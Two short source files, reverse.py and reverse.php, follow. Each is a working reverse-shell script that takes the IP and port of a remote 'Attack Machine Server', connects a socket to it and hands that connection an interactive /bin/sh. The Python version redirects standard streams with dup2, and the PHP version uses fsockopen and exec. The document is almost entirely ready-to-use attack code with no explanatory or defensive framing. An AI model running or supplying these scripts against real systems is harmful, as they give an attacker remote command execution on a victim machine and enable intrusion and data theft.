File: reverse.py
#!/usr/bin/python3

import argparse
import os
import socket
import subprocess

# Create CLI interface with arguments
parser = argparse.ArgumentParser(description="""Simple Reverse Shell script in
        Python that connects to a remote machine.""")

parser.add_argument('ip', metavar='IP',
                    help='IPv4 address of the remote machine')
parser.add_argument('port', metavar='PORT',
                    help='Port of the remote machine')

# Parse arguments
args = parser.parse_args()

# IP Address and Port of remote Attack Machine Server
IP = args.ip 
PORT = args.port 

# Convert Port to int
try:
    PORT = int(PORT)
except ValueError:
    print('{}: Invalid port "{}"'.format(__file__, PORT))
    exit(1)

# Create a Network Socket and Connect to remote Machine
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))

# Duplicate socket's file descriptor to standard streams.
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

# Send reverse shell
p = subprocess.call(['/bin/sh'])

File: reverse.php
#!/usr/bin/php
<?php

function show_usage() {
    global $argv;
    echo "usage: $argv[0] IP PORT\n" ;
	echo "\n";
	echo "Simple Reverse Shell script in Bash that connects to a remote machine.\n";
}

function show_help() {
    show_usage();
	echo "\n";
	echo "positional arguments:\n";
	echo "  IP          IPv4 address of the remote machine\n";
	echo "  PORT        Port of the remote machine\n";
}

# Only accept the two positional arguments: IP, PORT
if ($argc != 3) {
    show_help();
    exit(1);
}

# IP Address and Port of remote Attack Machine Server
$IP = $argv[1];
$PORT = intval($argv[2]); # Convert Port to int

# File descriptor for redirection
$FD = 3;

# Create a Network Socket and Connect to remote Machine
$sock = fsockopen($IP, $PORT);

# Send reverse shell
exec("/bin/sh -i <&$FD >&$FD 2>&$FD");
# TODO: Try other fd if 3 not available

?>
